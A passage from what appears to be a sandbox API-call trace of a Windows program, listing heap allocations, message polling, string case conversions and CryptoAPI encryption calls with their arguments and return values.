dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0188.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.224] CryptEncrypt (in: hKey=0xaa59a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x3776, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x3778) returned 1 [0188.224] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.224] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.224] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.225] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.225] CharLowerBuffW (in: lpsz="byte[14200]", cchLength=0xb | out: lpsz="byte[14200]") returned 0xb [0188.225] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.225] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.225] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.225] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.225] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.225] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.225] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.226] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.226] CryptEncrypt (in: hKey=0xaa59a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24db1d8*, pdwDataLen=0x8bef68*=0x3776, dwBufLen=0x3778 | out: pbData=0x24db1d8*, pdwDataLen=0x8bef68*=0x3778) returned 1 [0188.226] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.226] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.226] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.226] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.226] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.226] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.226] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.226] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0188.226] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.226] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0188.227] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.227] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.227] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0188.227] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.227] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0188.227] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.227] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.227] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.227] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.227] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.227] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.227] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.227] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.228] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.228] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.228] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.228] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.229] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.229] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.229] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.230] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.230] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.231] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0188.231] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.231] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0188.231] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.231] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.231] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.231] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0188.231] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.231] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0188.231] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0188.231] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.231] CryptDestroyKey (hKey=0xaa59a0) returned 1 [0188.232] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.232] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.232] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0188.232] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.232] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0188.232] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.232] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.232] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0188.232] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0188.232] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0188.232] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0188.232] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0188.233] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0188.233] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.233] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.233] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0188.233] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.233] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0188.233] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0188.233] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.233] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.233] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.233] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.233] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.233] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0188.234] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.234] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0188.234] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.234] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.234] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0188.234] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.234] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0188.234] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.234] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.234] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.234] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.234] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.234] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.235] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.235] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.235] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.235] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.235] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.235] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.235] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.235] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.235] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.235] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0188.235] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.235] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0188.236] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.236] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.236] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.236] CryptReleaseContext (hProv=0xa9ffb0, dwFlags=0x0) returned 1 [0188.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0188.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0188.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0188.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0188.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0188.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0188.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0188.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0188.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0188.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0188.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0188.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0188.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0188.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0188.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0188.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0188.239] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0188.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0188.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0188.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0188.239] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0188.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa418 [0188.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.239] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 